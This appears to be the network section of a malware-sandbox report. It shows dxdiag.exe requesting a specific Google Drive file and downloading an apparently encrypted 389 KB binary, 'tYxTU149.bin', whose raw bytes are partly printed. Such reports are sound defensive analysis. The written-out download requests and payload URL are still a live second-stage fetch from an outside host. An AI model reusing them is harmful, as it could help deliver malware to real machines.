Mar 12, 2025 12:07:21.238804102 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.238858938 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.238909006 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.240430117 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.240492105 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.240505934 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.240557909 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.245419025 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.245492935 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.245512962 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.245563984 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.250617981 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.250684977 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.250696898 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.250746012 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.251144886 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.251200914 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.251208067 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.251265049 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.252532959 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.252594948 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.252603054 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.252650976 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.254517078 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.254580021 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273345947 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273389101 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273412943 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273431063 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273442030 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273473978 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273521900 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273526907 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273575068 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273849964 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273894072 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273899078 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273906946 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273932934 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273943901 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273963928 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.273978949 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.273988008 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.274008036 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274033070 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274744034 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.274811029 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274852037 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.274893999 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.274903059 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274909973 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.274940968 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274969101 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.274974108 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.275023937 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.275784969 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.275825977 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.275840998 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.275849104 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.275865078 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.276789904 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.276820898 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.276835918 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.276846886 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.276891947 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.277363062 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.277415991 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.277425051 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.277476072 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.278539896 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.278580904 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.278606892 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.278614998 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.278634071 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.278682947 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.279922009 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.279985905 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.281466961 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.281541109 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.281548977 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.281594992 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.285753012 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.285801888 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.285830975 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.285839081 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.285852909 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.285890102 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.287878990 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.287939072 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.287950039 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.287996054 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.288002014 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.288048029 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.288714886 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.288757086 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.288779974 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.288789034 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.288810968 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.288841963 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.292159081 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.292237997 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.292246103 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.292294979 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.294105053 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.294171095 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.294179916 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.294220924 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.294614077 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.294668913 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.294676065 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.294727087 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.301096916 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.301151991 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.301160097 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.301209927 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.301526070 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.301575899 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.301583052 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.301628113 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.307446957 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.307503939 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.307512999 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.307558060 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.308052063 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.308101892 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.308109999 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.308156013 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.309053898 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.309104919 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.309112072 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.309159994 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.310146093 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.310194969 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.310203075 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.310247898 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.311889887 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.311956882 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.311964989 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.312012911 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.314973116 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.315028906 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.315037012 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.315088987 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.315498114 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.315561056 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.315567970 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.315619946 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.316570997 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.316627026 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.317874908 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.317924976 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.317933083 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.317977905 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.319689035 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.319726944 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.319740057 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.319747925 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.319772959 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.319806099 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.320219040 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.320262909 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.320271015 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.320327997 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.323584080 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.323645115 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.323653936 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.323699951 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.323999882 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.324053049 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.324059010 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.324106932 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.325027943 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.325072050 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.325079918 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.325123072 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.326452017 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.326503038 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.326509953 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.326559067 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.326927900 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.326999903 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.327007055 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.327052116 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.327928066 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.327974081 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.327981949 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.328025103 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.328855038 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.328900099 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.328907967 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.328950882 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.329689026 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.329735041 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.329742908 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.329786062 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.330296040 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.330380917 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.330434084 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:21.330442905 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:21.330481052 CET	49715	443	192.168.2.5	142.250.185.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 12:07:12.614408016 CET	54771	53	192.168.2.5	1.1.1.1
Mar 12, 2025 12:07:12.621176004 CET	53	54771	1.1.1.1	192.168.2.5
Mar 12, 2025 12:07:15.767894030 CET	49668	53	192.168.2.5	1.1.1.1
Mar 12, 2025 12:07:15.774477959 CET	53	49668	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 12, 2025 12:07:12.614408016 CET	192.168.2.5	1.1.1.1	0x272c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 12, 2025 12:07:15.767894030 CET	192.168.2.5	1.1.1.1	0x1561	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 12, 2025 12:07:12.621176004 CET	1.1.1.1	192.168.2.5	0x272c	No error (0)	drive.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Mar 12, 2025 12:07:15.774477959 CET	1.1.1.1	192.168.2.5	0x1561	No error (0)	drive.usercontent.google.com		142.250.185.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	142.250.184.238	443	2052	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 11:07:14 UTC	216	OUT	GET /uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-03-12 11:07:15 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 12 Mar 2025 11:07:15 GMT Location: https://drive.usercontent.google.com/download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-nKH1gzCtiXZO1QYQqKhQ8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	142.250.185.129	443	2052	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 11:07:17 UTC	258	OUT	GET /download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-03-12 11:07:20 UTC	5008	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AKDAyIsO6VZOu6ltRe2AZ_QSA4n-VGI9kiCf1P7c3rPpTYOw7Yv9m-lw_nENxmm059K4bfO3 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="tYxTU149.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 389184 Last-Modified: Wed, 12 Mar 2025 08:58:04 GMT Date: Wed, 12 Mar 2025 11:07:20 GMT Expires: Wed, 12 Mar 2025 11:07:20 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ctT4Xw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-12 11:07:20 UTC	5008	IN	Data Raw: 81 0e 03 2c de ae 0b 98 39 1a cf 7e 24 28 a4 57 57 8b d9 7a 9c 34 30 14 65 11 60 8e 74 7e 08 05 22 35 27 3b 11 d9 17 74 bf d3 a8 ef 0e 03 c8 c5 36 43 21 83 e2 62 51 f0 cf 90 79 db a2 e4 03 9d d5 c1 90 4c 0c 46 b4 51 37 a6 88 21 f7 bc de 2c 19 e9 5f fa 06 0b 9d e1 1d 8a 7a 7c d8 95 b0 d9 20 3e a7 45 17 8c 94 ae e6 d0 0a 8c 59 e0 e0 19 cd f3 77 a5 41 66 54 4c 88 52 34 79 e5 79 c7 9b fa 85 77 1e a6 f8 09 03 e0 6e 90 b2 84 e5 15 9b 7c 83 da 63 cc 2b a8 2c d2 c0 7b 28 54 11 ab fd bf 57 2f db a3 9e 3d bd 95 c3 b9 55 74 74 12 06 75 98 9b 4f e7 6a 9a d2 36 3f 89 25 bc 71 2c bb 15 31 2f e5 aa 75 59 87 02 67 95 8d 23 be 12 07 b8 70 10 6c 19 54 d6 48 a1 0a a7 24 34 29 45 15 22 9b b0 ee 5c aa 2e cd 67 17 02 89 34 ca 23 46 05 ad 77 1c a2 8a e1 4e 96 a3 bc ac e3 c6 70 Data Ascii: ,9~$(WWz40e`t~"5';t6C!bQyLFQ7!,_z\| >EYwAfTLR4yywn\|c+,{(TW/=UttuOj6?%q,1/uYg#plTH$4)E"\.g4#FwNp
2025-03-12 11:07:20 UTC	4681	IN	Data Raw: 27 f5 4f 13 a0 3b 06 21 05 51 4d 23 41 fd a8 9d 5d bc 69 c0 da bc 30 f3 aa 3a a8 99 9b 14 f6 9b 0e 4b c6 ea ec d1 ad 2d 2c e9 3e a2 77 1f 8e 16 a3 c7 02 cf 69 ae 4d 1a 61 fd 80 08 19 9d 8a 8b 40 fb fc d4 2a 3d 80 43 af 54 34 ef 2d fb ce 4a e8 19 4c 4a c5 2d 36 f4 79 8c a5 8a 1f 0c 27 47 12 66 11 79 1d cb c4 13 fa 1d 86 c6 1f 8a 0c 9b dd 72 9a 68 85 37 5e bc 0c 90 0e 2e 83 93 97 45 90 60 a6 12 e8 43 1f 22 bc 5b d7 e6 7d fb b4 e2 16 9a 6a 6e cc 1b 38 2d 39 5f d6 e0 da 90 d6 68 a2 e6 30 d2 a0 8e c6 02 a5 b6 bb bc cd 37 df a3 12 e7 57 68 f3 de 67 d0 3c 22 94 bf 20 a8 3b 92 99 ef 24 df 57 ae d8 cc a5 02 f8 2a 63 e8 2f da 07 e9 c1 f3 48 9b 60 ec 44 c4 45 c3 f9 7b 37 3f 98 46 98 6f 1f 32 d7 44 5b ee 57 23 66 36 9b e7 d3 2f 22 91 00 eb 82 b4 96 6d 9b 6d 29 fe ba Data Ascii: 'O;!QM#A]i0:K-,>wiMa@=CT4-JLJ-6y'Gfyrh7^.E`C"[}jn8-9_h07Whg<" ;$Wc/H`DE{7?Fo2D[W#f6/"mm)
2025-03-12 11:07:20 UTC	1324	IN	Data Raw: 3a 1e 1b bf 9c 28 fb 3e a1 82 6e 40 e5 ef a6 7a 55 a2 11 90 42 de d4 c4 c0 53 d8 39 01 0d 53 59 2f ae b5 4b 04 bf 63 3c 70 17 8c e1 94 f0 f8 99 b2 0e ae 0b 85 e6 40 20 a4 e2 76 11 14 92 c7 bb 88 1f f1 86 72 0d 81 07 12 5a 2b d3 3c 45 d9 b9 1c 3a 8a 5f a0 c6 91 38 d4 2e 30 3f da f6 e9 cc ae 84 27 9d 9b 48 19 fb 37 48 f7 8b 49 c4 64 c3 bf b0 38 3b 60 55 1b cf 95 d6 76 6c f9 12 88 3c 1a 01 cd 00 0f be 99 85 88 e2 d9 ec da 8a 8f 90 42 3e 85 7e 9d e8 1b 32 7c b3 12 c0 e9 32 58 a5 dc 59 67 5a e7 5b 61 38 87 3d 11 6b ca 05 69 99 72 f3 e9 0a 8c 94 77 91 e2 b1 93 08 f7 be d1 c9 a4 03 b4 89 48 6e 8f f4 fa 17 f6 29 20 fa 44 e8 0a 94 71 65 92 a6 53 7c 12 19 f4 6c 31 f5 1d ab 24 c6 be 98 c4 76 98 2c df 0e 0f 9a 6b 13 33 e7 68 63 08 8b 3e 6e a1 c0 be b8 06 0b 9d e1 5d Data Ascii: :(>n@zUBS9SY/Kc<p@ vrZ+<E:_8.0?'H7HId8;`Uvl<B>~2\|2XYgZ[a8=kirwHn) DqeS\|l1$v,k3hc>n]
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: f2 8d 67 12 0d 25 11 1d 02 88 c4 9a e5 5e 86 0c c0 da 4c b2 fe 31 9a 92 70 b6 1e 40 f0 11 4e 4e 49 12 d7 25 b1 23 a6 7e c9 00 1f 9f bc 18 c3 e6 6e 3f f4 c6 16 8e 6a 6e cc 1b 38 2d 39 5f d6 17 08 c0 96 68 aa e6 30 c2 fe 0d 86 0a d9 75 fb e2 64 b7 9f c6 f7 67 17 1c 26 5e 27 ab 1d a5 d4 18 01 2f 7b 54 b7 68 64 01 75 ed d8 3c a2 41 ec 2a a8 23 6f ce 07 f9 c1 f3 9a 50 20 ec 44 c4 45 2a ed 2c 77 6f a2 06 98 6f 8a f6 97 45 c7 2a 17 22 cd f2 db 32 36 a8 62 91 64 2e c2 ba 91 a3 db 6d 83 38 fa 68 89 c5 78 53 07 42 7e b2 de 3c cb 9e c2 47 aa 88 72 72 df b2 74 0e d8 8b 2e 25 ec d8 dd f7 67 cb 1f 75 cd 82 dc 0e 33 0b 55 95 ba 4e 77 30 9e d6 df c5 0c c1 5f f9 3e 06 9e 9c 78 24 7b b9 f9 b4 fa f9 59 e7 25 a6 3a ba 99 b7 1e 17 7d 98 02 63 f0 be 84 65 cf 24 95 57 fa 13 86 Data Ascii: g%^L1p@NNI%#~n?jn8-9_h0udg&^'/{Thdu<A#oP DE,wooE*"26bd.m8hxSB~<Grrt.%gu3UNw0_>x${Y%:}ce$W
